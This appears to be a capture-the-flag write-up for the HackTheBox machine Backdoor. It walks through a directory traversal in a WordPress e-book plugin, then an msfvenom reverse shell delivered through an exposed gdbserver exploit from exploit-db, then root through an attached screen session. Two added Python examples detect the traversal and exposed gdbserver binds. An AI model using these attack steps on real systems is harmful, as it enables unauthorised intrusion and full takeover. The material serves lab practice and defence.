HackTheBox – Backdoor Write-up

Hi everyone! This write-up is on Backdoor, an easy Linux machine. I wouldn’t say this machine is actually easy. It requires us to manually enumerate WordPress’s plugin directory and exploit a directory traversal vulnerability to leak the running processes, then exploit the exposed gdbserver process to obtain a reverse shell, before attaching to root’s screen session for a root shell. Let’s get started!

1. Nmap enumeration

kali@kali~$ IP=10.10.11.125
kali@kali~$ sudo nmap -sC -sV -p- $IP                                                                                            
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-06 12:26 EDT
Nmap scan report for 10.10.11.125
Host is up (0.074s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Web enumeration

2.1 Plugin discovery

When accessing http://10.10.11.125/wp-content/plugins/, I noticed an e-book plugin directory (ebook-download).

A quick Google search turned up an exploit for it here: the plugin has a directory traversal vulnerability that allows us to download any file on the machine.

2.2 Leak processes via Directory Traversal

While Googling for RCE via directory traversal, I came across an article that talks about leaking processes via directory traversal here. By leaking the process list, we may find out which process is listening on port 1337.

Visit http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/sched_debug to download the file. Once downloaded, I scrolled through the processes and noticed an interesting one, gdbserver.

kali@kali~$ cat sched_debug
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
...
S      gdbserver 96467         9.348917        13   120         0.000000         3.398132         0.000000 0 0 /autogroup-204

Next, we can query that PID further. In your browser, go to http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/96467/cmdline

We will see that gdbserver is indeed listening on port 1337, bound to 0.0.0.0 (all interfaces). The arguments appear run together because /proc/<pid>/cmdline separates them with NUL bytes, which cat does not display.

kali@kali~$ cat cmdline               
../../../../../../../proc/96467/cmdline../../../../../../../proc/96467/cmdline../../../../../../../proc/96467/cmdlinegdbserver--once0.0.0.0:1337/bin/true<script>window.close()</script>
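As an added example (not part of the original write-up), here is how a defender could spot these two traversal requests in the web server's access log. The log lines are constructed to match the requests used above, one of them URL-encoded, plus one benign download; the plugin path and the ebookdownloadurl parameter are taken from the page.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed Apache access-log lines (not captured from the box): the two traversal
# requests used in the write-up, one of them URL-encoded, plus one benign download.
SAMPLE_LOG = """\
10.10.14.3 - - [06/Apr/2022:12:40:01 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/sched_debug HTTP/1.1" 200 51234
10.10.14.3 - - [06/Apr/2022:12:41:17 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F96467%2Fcmdline HTTP/1.1" 200 87
192.0.2.10 - - [06/Apr/2022:12:42:05 -0400] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/sample.pdf HTTP/1.1" 200 10240
"""

# Common Log Format prefix: client, identity, user, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so %2e%2e%2f and double-encoded variants are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(param_value):
    """True if the decoded ebookdownloadurl value escapes the plugin's download directory."""
    decoded = decode_fully(param_value).replace("\\", "/")
    if decoded.startswith("/"):          # absolute path such as /proc/sched_debug
        return True
    return any(seg == ".." for seg in decoded.split("/"))

def find_traversal_attempts(log_text):
    """Return (client_ip, status, decoded_path) for every traversal via filedownload.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/ebook-download/filedownload.php"):
            continue
        # parse_qs decodes one layer; decode_fully handles anything nested.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ebookdownloadurl", []):
            if is_traversal(value):
                hits.append((m["ip"], m["status"], decode_fully(value)))
    return hits
```

A 200 status on a flagged request, as in both constructed lines, means the file was actually served and the host should be treated as compromised.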

2.3 Exploit gdbserver for initial shell

A quick Google search for a gdbserver exploit turned up this one. The steps needed are already shown in the exploit’s comments. Firstly, we generate a reverse shell payload, then listen on port 1337 for the incoming connection.

kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1337 PrependFork=true -o rev.bin
kali@kali~$ nc -lvnp 1337

Download the exploit and run it.

kali@kali~$ wget https://www.exploit-db.com/raw/50539
kali@kali~$ python3 50539 $IP:1337 rev.bin                                                                 
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Our Netcat listener should now have an initial shell. I spawn a TTY shell with Python.

kali@kali~$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.125] 38204
python3 -c 'import pty; pty.spawn("/bin/bash")'
user@Backdoor:/home/user$ 

We can now obtain the flag.

user@Backdoor:/home/user$ cat user.txt
cat user.txt
1bf*****************************
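As an added example (not the author's code), a small host audit that reads /proc/<pid>/cmdline the way a defender would: it splits the NUL-separated arguments, which is why the cat output earlier looked glued together, and flags any gdbserver bound to something other than loopback, which is exactly the exposure that gave us the shell. The cmdline contents are constructed from what the write-up shows; pid 859's entry is the root screen loop seen later on the box.

```python
# Constructed /proc/<pid>/cmdline contents (not captured from the box). The kernel
# separates argv entries with NUL bytes, which is why cat showed them run together.
SAMPLE_CMDLINES = {
    96467: b"gdbserver\x00--once\x000.0.0.0:1337\x00/bin/true\x00",
    1201: b"gdbserver\x00--once\x00127.0.0.1:2345\x00./a.out\x00",
    859: b"/bin/sh\x00-c\x00while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \\;; done\x00",
}

def parse_cmdline(raw):
    """Split a /proc/<pid>/cmdline blob into argv, dropping the trailing empty field."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]

def bind_is_exposed(arg):
    """True when a host:port argument binds to a wildcard or non-loopback address."""
    host, sep, port = arg.rpartition(":")
    if not sep or not port.isdigit():
        return False
    if host in ("", "0.0.0.0", "*", "::", "[::]"):
        return True
    return not (host.startswith("127.") or host in ("localhost", "::1", "[::1]"))

def find_exposed_debug_servers(cmdlines):
    """Return (pid, program, bind) for every gdbserver reachable from other hosts."""
    findings = []
    for pid, raw in cmdlines.items():
        argv = parse_cmdline(raw)
        if not argv or argv[0].rsplit("/", 1)[-1] != "gdbserver":
            continue
        for arg in argv[1:]:
            if bind_is_exposed(arg):
                findings.append((pid, argv[0], arg))
    return findings
```

On a live host the same functions can be fed from a loop over /proc/[0-9]*/cmdline; gdbserver has no authentication, so any non-loopback bind is code execution for whoever can reach the port.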

Privilege escalation

Attach to existing screen

Firstly, I looked at the processes running as root and noticed that screen is executed with the -S flag, which creates a new named session (here, root).

user@Backdoor:/home/user$ ps aux | grep root
...
root         859  0.0  0.0   2608  1752 ?        Ss   16:34   0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

Reading the man page, I found out I can attach to it using the “-x” flag. If we try to attach directly, it complains that the terminal type is not set. Therefore, we have to set TERM first before attaching to the screen session. This source also explains how to connect to another user’s screen session. Finally, we have a root shell, allowing us to obtain the flag.

user@Backdoor:/home/user$ TERM=vt100; export TERM
user@Backdoor:/home/user$ screen -x root/root
root@Backdoor:~# 
root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
8b2*****************************
root@Backdoor:~# 

Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
